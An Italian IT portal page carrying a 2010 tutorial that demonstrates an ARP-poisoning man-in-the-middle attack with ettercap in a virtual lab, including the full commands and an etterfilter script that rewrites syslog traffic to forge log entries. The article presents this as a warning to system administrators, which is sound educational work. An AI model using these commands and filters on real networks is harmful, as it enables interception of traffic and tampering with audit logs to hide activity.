Home Tecnica Sicurezza ettercap: il man-in-the-middle facile

In evidenza

Smau Milano 2013 - 50ma edizione

Smau Milano 2013 - 50ma edizione

Forte dell’esperienza maturata nel Roadshow, Smau torna a Milano per la cinquantesima edizione del...
TecnoWorkshop Taranto2013: il programma

TecnoWorkshop Taranto2013: il programma

Ecco il programma del TecnoWorkshop Taranto2013 che si terrà sabato 14 settembre dalle 9:00 alle 14:30...
Festival della tecnologia ICT: la rivoluzione è cominciata

Festival della tecnologia ICT: la rivoluzione è cominciata

Si chiama festival della tecnologia ICT e non è una fiera né un congresso, ma un evento B2B innovativo...
TecnoWorkshop Taranto2013

TecnoWorkshop Taranto2013

Il giorno 14 settembre (sabato) dalle 9:00 alle 14:30 si terrà a Taranto, presso la sala Resta del...

Offerte di lavoro da InfoJobs

Società Italiana dei Professionisti delle Scienze dell'Informazione

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

Iscrizione nuovi soci (10/10/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 10/10/2013 ha iscritto nel proprio Libro dei Soci dei nuovi professionisti:

11 Nov 2013 - Letture:452

Convenzione con ANDIP

La Società Italiana dei Professionisti delle Scienze dell'Informazione ha stipulato una convenzione con l'associazione ANDIP (Associazione Nazionale per la Difesa della Privacy) grazie alla quale ogni Socio avrà la possibilità di accedere alle iniziative, convegni e quant'altro proposto da ANDIP.

23 Set 2013 - Letture:494

TecnoWorkshop Taranto2013: conclusioni

L'evento ICT tanto atteso nella provincia jonica si è da poco concluso; in qualità di Coordinatore Regionale SIPSI sento il dovere di ringraziare i professionisti e consulenti venuti per conoscere ed ascoltare tutti i colleghi che hanno relazionato ed ogni...

19 Set 2013 - Letture:488

Nomina Coordinatore regionale (31/07/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 31/07/2013 ha nominato il seguente Coordinatore regionale.

10 Set 2013 - Letture:506

Iscrizione nuovi soci (31/07/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 31/07/2013 ha iscritto nel proprio Libro dei Soci dei nuovi professionisti ed aziende.

09 Set 2013 - Letture:522

Modifica del Regolamento Attuativo

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 28/03/2013 ha modificato il proprio Regolamento Attuativo.

09 Apr 2013 - Letture:853

Iscrizione nuovi soci (28/03/2013)

La Società Italiana dei Professionisti delle Scienze dell'Informazione, con delibera del Consiglio Direttivo del 28/03/2013 ha iscritto nel proprio Libro dei Soci dei nuovi professionisti.

29 Mar 2013 - Letture:969

Bandi di Concorso

Avviso di selezione nell'Agenzia per l'Italia Digitale di 3 analisti ICT

Nell’ambito del progetto Sistema Pubblico di connettività l'Agenzia per l'Italia digitale ha indetto una procedura comparativa per il conferimento di tre incarichi di collaborazione coordinata e continuativa per profili specialistici di “Analista ICT”.

09 Mag 2013 - Letture:1103

Tips & Tricks

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

Come controllare i punti della patente di guida?

Un mio cliente dopo la notifica di verbale di accertamento della polizia municipale, comunica attraverso il modulo i dati della patente di un suo amico che era il conducente al momento dei fatti. Si è visto però recapitare una lettera del...

17 Ott 2013 - Letture:841

Realizzare un "conto alla rovescia" da terminale

Mi è capitato in questi giorni di necessitare di un contatore alla rovescia (o countdown in gergo) da utilizzare in un evento per dare il tempo ai relatori che si susseguivano nei loro interventi. Sembra strano ma quando si organizza...

16 Set 2013 - Letture:756

Grub2: ripristino di Grub da live-cd

Può succedere che GRUB2, per svariate cause non si avvii più, rendendo inservibile il nostro sistema operativo Debian (o altri sistemi operativi GNU/Linux installati nell’hard disk). Una delle cause principali di tutto questo è per esempio il voler installare anche Windows...

29 Mar 2013 - Letture:3860

Thomson TG585 v8: cambio DNS

Il software del router Thomson TG585 v8 non permette di modificare i DNS, così, se per esempio si volessero sostituire i DNS del provider con gli OpenDNS, non si trova nessuna interfaccia grafica per farlo. L'unica strada è quella di...

28 Feb 2013 - Letture:3603

Emacs: tabbar-mode

Una cosa utilissima presente negli editor (ma anche nei browser web) è quella di poter aprire una serie di documenti non in nuove pagine ma in schede o tab. Rimanendo nella categoria degli editor, un ottimo esempio è dato da Geany...

27 Feb 2013 - Letture:1100

Touchpad Tapping & Scrolling in Debian GNU/Linux

In Debian Squeeze 6 (anche in Wheezy), il tapping è disabilitato di default: "(xserver-xorg-input-synaptics (in Squeeze) has tapping disabled by default for touchpads with one or more physical buttons; see /usr/share/doc/xserver-xorg-input-synaptics/NEWS.Debian.gz. For a list of available options, see synclient -l . Not...

26 Feb 2013 - Letture:1297

Comparare due float in bash

Mi è capitato spesso di dover fare dei test tipo A > B dove A e B sono due numeri reali (float) all'interno di uno script bash. Il problema però è che bash ha solo una aritmetica intera... Cercando un po'...

22 Feb 2013 - Letture:1263

I più attivi

Dati e punteggi dell'ultimo anno

Maria Elisa Scarcia Maria Elisa Scarcia
5 articoli
0,532 punti totali
Vittorio D'Aversa Vittorio D'Aversa
9 articoli
0,350 punti totali
Rodolfo Giometti Rodolfo Giometti
10 articoli
0,271 punti totali
Giovanna Casamassima Giovanna Casamassima
9 articoli
0,250 punti totali
Alfredo Visconti Alfredo Visconti
8 articoli
0,178 punti totali

Ci hanno visitato

Oggi:1134
Ieri:2558
Totali (14/04/09):2621477

I nostri numeri

Articoli pubblicati: 783
Iscritti al portale: 1152
Iscritti all'Elenco: 231
Iscritti ML Discussioni: 408
Iscritti ML Articoli: 31
Iscritti ML Lavoro: 203
 
Corso pratico di una giornata sulle tecniche di prototipazione rapida per sistemi GNU/Linux embedded

L'SMS autoprodotto!

Tempo fa sulla mailing list di CFI ho provato a lanciare l'idea di effettuare un...

SL4A e il drone parla più lingue

Chi come me non ama Java si sentirà a disagio volendo programmare una qualsiasi ...

Server Linux: tutti i trucchi per farlo al meglio

Volete fare un server Linux per la vostra impresa, ufficio o semplicemente per c...

munin: come ti controllo il server aziendale

In questi ultimi tempi il server che mantiene il nostro portale è sottoposto ad ...

Universal USB Installer 1.8.04 e Ubuntu Linux 10.10

Rilasciata il 10.10(.2010) la nuova versione di Ubuntu Linux (la data corrispond...

Registrazione domini: qualche novità per i “punto it”

Dal prossimo mese di luglio, esattamente dal giorno 11, presso il Registro ...

LIM: la lavagna multimediale con il wiimote

LIM sta per Lavagna Interattiva Multimediale, ed è un progetto che, tramite l'...

Thomson TG585 v8: cambio DNS

Il software del router Thomson TG585 v8 non permette di modificare i DNS, così, ...

Perché cross compilare quando si può compilare nativamente?

Lavorando con architetture diverse mi trovo spesso a dover utilzzare uno stesso ...

OpenID Connect Standard. Riparte il cloud?

Che il mondo cloud, da sempre, non decolli anche a causa delle non chiare tecnol...

Cluster VMWARE

In questo articolo vediamo come realizzare un cluster di macchine virtuali con u...

F-Droid, e il FOSS su Android è servito!

Come Software Libre Evangelist mi son spesso trovato ad incoraggiare l'uso del s...

TurnKey Linux: accendi e vai!

Quanto tempo occorre per installare e configurare una macchina LAMP (Linux, Apac...

Realizzare un "conto alla rovescia" da terminale

Mi è capitato in questi giorni di necessitare di un contatore alla rovescia (o c...

Nvidia 295.33, ecco i nuovi driver per linux versione 3.3

L'annuncio è di qualche giorno fa, Nvidia rilascia i nuovi driver 295.33 con sup...

Spotify sbarca in Italia e anche Linux

Spotify è arrivato anche in Italia da poco più di una settimana e finalmente s...

Cloud Money

Discorrendo con un collega di cloud computing, si è finito, come al solito, a pa...

Sicurezza informatica: safety, dependability, security

La sempre maggiore diffusione delle tecnologie ha profondamente rivoluzionato la...

Git in Eclipse

Chi mi conosce sa la mia avversione (del tutto personale, ci tengo a sottolinear...

busybox & Android: la command line facile

Nei precedenti articoli abbiamo visto due tecniche per aggiungere nuovi programm...

Android: se non hai il telefono usa l'emulatore!

In questi giorni sto valutando di comprare un cellulare basato su Linux. Inizial...

I-Memo: le password personali sempre con te

Prodotto dalla MensTecnica, una giovane azienda della Basilicata fondata nel 200...

Process Analysis per Disaster Recovery Plan

La gestione del processo aziendale, per la sicurezza dei sistemi, rappresenta il...

Linaro, la no-profit che produce distribuzioni Linux/ARM

Il progetto Linaro presentato nel 2010 da colossi del calibro di Freescale Semic...

I dati e le loro anomalie nascoste

La motivazione per questo articolo nasce dalla crescente problematica di gestion...

Rete lenta? Vediamo chi consuma...

Molte volte capita di trovarsi la rete molto lenta e magari non abbiamo a dispos...

Installare Linux su una USB key: ecco come!

L’installazione  e l'avvio di una distribuzione Linux Live da un supporto U...

Boot from SAN

Intendiamoci, non è l’ultima briciola tecnologica caduta da un banchetto alla NA...

Intervista esclusiva a Mageia Linux

La Presidente dell'Associazione MAGEIA.ORG, Anne Nicolas, in questa intervi...

ASUS U36SD il notebook in soli 19mm

La concorrenza al più blasonato della “mela” si fa agguerrita specie nell'ultimo...

Fare login con la Tessera sanitaria

In questi giorni mi è capitato per le mani un sistema con attaccato un lettore d...

WODE, l'emulatore DVD per la Wii

Qualche giorno fa mi è capitato di sfidare mio cognato ad una partitella a tenni...

Quando manca il comando «ldd»

Mi son trovato in questi giorni a dover lavorare con una distribuzione GNU/Linux...

Grep e Strings due giganti di Linux

Il tempo libero serve anche a sperimentare e quando si ha la passione per la com...

E-Waste: il rischio nella spazzatura

Partendo dalla segreteria telefonica attraverso il fax e l’agendina elettronica ...

Emacs: tabbar-mode

Una cosa utilissima presente negli editor (ma anche nei browser web) è quella di...

Cloud Computing: cos'è veramente?

Da qualche tempo si sente sempre più parlare di Cloud Computing. Sembra che ques...

Touchpad Tapping & Scrolling in Debian GNU/Linux

In Debian Squeeze 6 (anche in Wheezy), il tapping è disabilitato di default:&nbs...

PHP & Busybox httpd

Esistono diversi web server pensati appositamente per i sistemi embedded, alcuni...

La gestione dei pacchetti di OpenWRT

Una distribuzione embedded è quanto più versatile quanti più pacchetti software ...

Quando il cliente complica il lavoro del consulente ....

Recentemente sono intervenuto presso una Piccola-Media-Impresa che lamentava pro...

Cifratura wireless: TKIP vs AES

Una delle domande più frequenti di chi intende implementare una rete Wireless è...

Ubuntu Spyware: cosa si può fare?

Il Software Libero è una questione di libertà, non di prezzo. La libertà è quell...

Il settore danneggiato e l'acquisizione forense

Se si deve acquisire un hard disk in maniera forense, ossia con tutti i crismi n...

Da web 1.0 a web 3.0 passando per il web 2.0, ma di cosa stiamo parlando?

Per capire le evoluzioni è opportuno dare una piccola spiegazione dei termini: ...

Velocizzare la compilazione di Linux

Lavorando con sistemi embedded di diversa natura mi capita spessissimo di dover ...

Come ti controllo i tassi di interesse con Linux

In questi giorni sto cercando di fare una surruga per il mutuo di casa mia. Tra ...

Comparare due float in bash

Mi è capitato spesso di dover fare dei test tipo A > B dove A e B sono due nu...

La Business Intelligence tra paura e tanta burocrazia

Le aziende cosi come le nostre pubbliche amministrazioni sono ormai anni e anni ...

Il NAS D-Link DNS-343

Grazie alla D-Link azienda produttrice di apparecchiature di rete e non solo v...

Implementare una LIM con Linux

Come promesso rieccomi qui per illustrare come realizzare una LIM (che ricordo s...

Snom 870: il telefono con Linux

Definirlo solo telefono è sicuramente riduttivo, infatti lo Snom 870 è sicuramen...

Phishing: quando la rete pesca la truffa…

Il phishing è un tipo di truffa via Internet attraverso la quale un aggressore c...

Come disabilitare il «Global Menu» in Ubuntu 11.10 e 12.04

Una delle novità introdotte nelle ultime versioni di Ubuntu (che usano quindi Gn...

Arduracing: come realizzare una robot-car intelligente con Arduino

Arduracing è un progetto realizzato con Arduino in collaborazione con il Lucccal...

Verificare spazio su disco su UNIX

Nella gestione si sistemi informativi capita spesso di accedere a postazioni ser...

Cosino e la prototipazione rapida

Durante la mia più che decennale esperienza lavorativa con i sistemi embedded mi...

Se il Galaxy S2 non va a dormire

Come felice possessore di un Samsung Galaxy S2 appena ho saputo che si poteva ag...

Multi puntatore su Ubuntu 10.4: ecco come

Tempo fa ebbi modo di dare un'occhiata al progetto MPX per un cliente. La cosa n...

Come controllare i punti della patente di guida?

Un mio cliente dopo la notifica di verbale di accertamento della polizia municip...

ettercap: il man-in-the-middle facile

Stampa E-mail
(1 voto, media 5.00 di 5)
Area Tecnica - Sicurezza
Scritto da Rodolfo Giometti   
Domenica 29 Agosto 2010 14:34

logo

Troppo spesso mi rendo conto che molti considerano la rete aziendale o quella casalinga come sicura, pensando cioè che nessuno possa sapere quello che entra ed esce da e verso il proprio PC. Si pensa cioè che nessuno possa intercettare i nostri dati.

Ovviamente questo non è vero... a meno che non si usino trasmissioni basate su sistemi crittografici ben testati e liberamente studiabili per proteggere le proprie comunicazioni. In questo caso infatti le possibilità di essere intercettati è praticamente nulla.

Si noti che ho detto intenzionalmente «liberamente studiabili», sì perché un sistema è sicuro solo se è dimostrato che è sicuro e non perché ce lo assicura qualcuno... men che meno chi ce lo vuol vendere (mai fidarsi dei venditori! n.d.a. :). Di solito i sistemi basati sul Software Libero hanno questa caratteristica perché sono gli unici che possono essere validati da chiunque a partire dal codice sorgente fino al processo di compilazione.

Per sottolineare quanto detto, e quindi dimostrare come sia facile effettuare un banale attacco informatico in una LAN aziendale e/o casalinga userò ettercap. Con ettercap è possibile realizzare un attacco di tipo man-in-the-middle in una rete LAN dimostrando così molto velocemente come questa non sia assolutamente sicura se non si prendono le dovute precauzioni.

Naturalmente è possibile usare ettercap non solo per azioni cattive, ma anche per quelle buone: è possibile infatti usarlo anche per scoprire altri attacchi di tipo man-in-the-middle e proteggere quindi la propria LAN!

Quello che vi mostrerò in questo articolo serve solo per fare un esempio di quello che potrebbe succedere se non si protegge la propria LAN in maniera opportuna e non va inteso in nessun modo come un esempio di come compiere azioni illegali! Al contrario, serve a far vedere agli amministratori di sistema distratti da cosa si devono difendere!

Come esempio vediamo come taroccare i messaggi di log che un sistema può inviare ad un server il quale ha il compito di memorizzarli sui sui dischi interni per successive analisi da parte degli amministratori di rete. Questo sistema di invio dei log è standard su molti sistemi ma purtroppo presenta gravi lacune di sicurezza non utilizzando nessun sistema di crittazione e/o autenticazione per lo scambio dati!

Ma procediamo passo passo ed installiamoci ettercap; sulla mia ubuntu do semplicemente:

# aptitude install ettercap

e poi facciamo alcune supposizioni:

  1. Per effettuare l'attacco man-in-the-middle dobbiamo avere un PC nella sottorete da attaccare; supponiamo di avere una LAN di classe C con indirizzi nella sottorete 192.168.56.0/24.
  2. Supponiamo poi di sapere quale sia l'IP del server che raccoglie i log dei sistemi apparteneti alla sottorete; nel nostro caso 192.168.56.4.
  3. Il nostro attacco, in fine, si baserà sul modificare i log che un host invia al server; supponiamo che il suo IP sia 192.168.56.3.

Il punto 1. sembra molto difficile da realizzare, ma in realtà non lo è; infatti in molti casi gli attacchi ad un sistema informatico avvengono proprio da dentro la LAN e non dal di fuori! Nel nostro caso poi il fatto di voler inquinare i messaggi di log di un sistema è voluto proprio da chi sta dentro la LAN in modo da mascherare le (possibili) attività illecite che si vogliono perpretare.

Il punto 2. è anch'esso banale da realizzare. Riuscire a sapere l'IP di un server di un servizio pubblico è molto semplice, addirittura per un dipendente infedele basterà chiederlo all'amministratore di sistema...

Il punto 3. dice quale sarà il tipo di attacco che vogliamo realizzare, ma ne potremmo fare molti altri: carpire password, sniffare e-mail, sapere quali siti web vengono visitati da un PC, ecc..

Appurato questo facciamo uno schema del nostro attacco man-in-the-middle; normalmente la connessione tra il log server e un qualsiasi PC è:

                     +-----------+
                     |    HUB    |
                     +-+-+-+-+-+-+
                       |   |   |
        +--------------+   |   +--------------+
        |                  |                  |
+-------+-----------+      |        +---------+---------+
|    Log Server     ||        PC         |
|   192.168.56.4    |      |        |   192.168.56.3    |
| 08:00:27:E1:B6:C0 |      |        | 08:00:27:6c:b3:7f |
+-------------------+      |        +-------------------+
                           |
                   +-------+-----------+
                   |       MITM        |
                   |   192.168.56.1    |
                   | 0a:00:27:00:00:00 |
                   +-------------------+

In nero ho riportato i collegamenti fisici, mentre in rosso quelli logici (quelli cioè che vengono visti dagli utenti dei vari sistemi). Ho anche riportato la connesione fisica della macchina MITM che uso per eseguire l'attacco man-in-the-middle e dove ho installato ettercap, la quale, al momento, non ha nessun tipo di colloquio coi due sistemi vittima.

In queste condizioni le tabelle ARP dei due sistemi sono, per il log server:

# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.3             ether   08:00:27:6c:b3:7f   C                     eth0

mentre per il PC:

# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.4             ether   08:00:27:E1:B6:C0   C                     eth0

Ora iniziamo ad analizzare i pacchetti di log che i due sistemi si scambiano generando dei messaggi del tipo:

Aug 26 16:19:56 192.168.56.3 root: System is doing something evil

(per generare questi messaggi ho usato il comando logger)

Quindi abilitiamo l'attacco man-in-the-middle sulla macchina MITM e sniffiamo tutti i pacchetti che le due macchine si scambiano, ettercap ci mostra allora il seguente output:

# ettercap -T -i vboxnet0 -M arp /192.168.56.3/ /192.168.56.4/
[sudo] password for giometti:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on vboxnet0... (Ethernet)

vboxnet0 ->    0A:00:27:00:00:00      192.168.56.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.56.3 08:00:27:6C:B3:7F

GROUP 2 : 192.168.56.4 08:00:27:E1:B6:C0
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help



Thu Aug 26 16:20:01 2010
UDP  192.168.56.3:514 --> 192.168.56.4:514 |

root: System is doing something evil

(non tenete conto delle date, potrebbero non essere coerenti, ciò è dovuto ad errate impostazioni dei timer di sistema e alle varie revisioni dell'articolo... inoltre, come avrete capito, il test l'ho fatto con delle macchine virtuali che girano su Virtualbox)

Se ora andiamo a ricontrollare la tabella ARP del log server:

root@node00:~# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.3             ether   0a:00:27:00:00:00   C                     eth0

e del PC:

sarge:~# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.4             ether   0A:00:27:00:00:00   C                     eth0

vediamo subito che sono state modificate: l'attacco è quindi in atto! Da ora in poi tutti i pacchetti da e verso i due PC vittima passeranno dal sistema (MITM) che attua l'attacco, si ha cioè una connessione logica (in rosso) del tipo:

                     +-----------+
                     |    HUB    |
                     +-+-+-+-+-+-+
                       |   |   |
        +--------------+   |   +--------------+
        |                  |                  |
+-------+-----------+      |        +---------+---------+
|    Log Server     |      |        |        PC         |
|   192.168.56.4    |      |        |   192.168.56.3    |
| 08:00:27:E1:B6:C0 |      |        | 08:00:27:6c:b3:7f |
+-------------------+      |        +---------+---------+
             ^             |                  ^
             |     +-------+-----------+      |
             |     |       MITM        |      |
             +---->|   192.168.56.1    |<-----+
                   | 0a:00:27:00:00:00 |
                   +-------------------+

Infatti, come mostrato, ettercap ci fa vedere il traffico di rete che intercorre tra le due macchine... ma non solo! Con ettercap lo possiamo anche modificare questo traffico di rete, basta usare un filtro. Un filtro ettercap è un programma scritto in un linguaggio molto simile al C e che può essere usato per analizzare e/o modificare al volo i pacchetti di rete intercettati da ettercap.

Il codice sorgente di un filtro appare come segue:

if (udp.src == 514 || udp.dst == 514) {
        if (search(DATA.data, "evil")) {
                replace("evil", "good");
                msg("string \"evil\" replaced!\n");
        }
}

ed il significato è abbastanza banale: se un pacchetto è di tipo UDP con porta sorgente o destinataria 514 e dentro il campo dati del medesimo pacchetto trovi la stringa evil, rimpiazzala con la stringa good e mostra il messaggio string "evil" replaced! all'utente ettercap.

Ora salviamo il filtro nel file syslog.filter e compiliamolo salvando il compilato del file syslog.filter.ef:

$ etterfilter syslog.filter -o syslog.filter.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'syslog.filter'  done.

Unfolding the meta-tree  done.

Converting labels to real offsets  done.

Writing output to 'syslog.filter.ef'  done.

-> Script encoded into 9 instructions.

quindi rilanciamo ettercap con il nuovo filtro:

# ettercap -T -i vboxnet0 -M arp -F syslog.filter.ef /192.168.56.3/ /192.168.56.4/

Se ora mandiamo un nuovo messaggio di log come già fatto prima, ettercap ci dice:

Thu Aug 26 16:25:41 2010
UDP  192.168.56.3:514 --> 192.168.56.4:514 |

root: System is doing something evil

string "evil" replaced!

mentre il log server ci mostra il messaggio:

Aug 26 16:25:45 192.168.56.3 root: System is doing something good

Il messaggio di log è stato taroccato! Facile no? :)

 
 

Login

           | 

In primo piano

Un nuovo sponsor per il Portale

Un nuovo sponsor per il Portale

Vi sarete senz'altro accorti che il nostro portale, da qualche tempo, è molto più affidabile e reattivo....
Pubblicità mirata dei prodotti

Pubblicità mirata dei prodotti

Hai un prodotto o un servizio da pubblicizzare? Fallo su consulenti-ict.it! Pubblicizzare un prodotto...
Recensioni sul Portale

Recensioni sul Portale

Hai un prodotto hardware/software o un libro riguardante uno dei temi dell'ICT? Vuoi farlo conoscere...

Professionisti e Consulenti ICT

Dai un'occhiata al nostro Elenco dei Professionisti e Consulenti ICT.
Trova l'esperto informatico, elettronico o delle telecomunicazioni che fa per te!

Mappa dell'Italia Puglia Molise Campania Abruzzo Marche Lazio Umbria Basilicata Toscana Emilia Romagna Calabria

- ItaliaCMS

Offerte di lavoro

Visualizza Topic »

Rodolfo Giometti at Studio EnneEnne - GNU/Linux embedded systems
La casa vacanze in Toscana perfetta per famiglie e gruppi numerosi.

Discussioni dal Forum

Nessun post da visualizzare.

Eventi

Non ci sono eventi in programma

Sondaggi

busyCaricamento Sondaggio...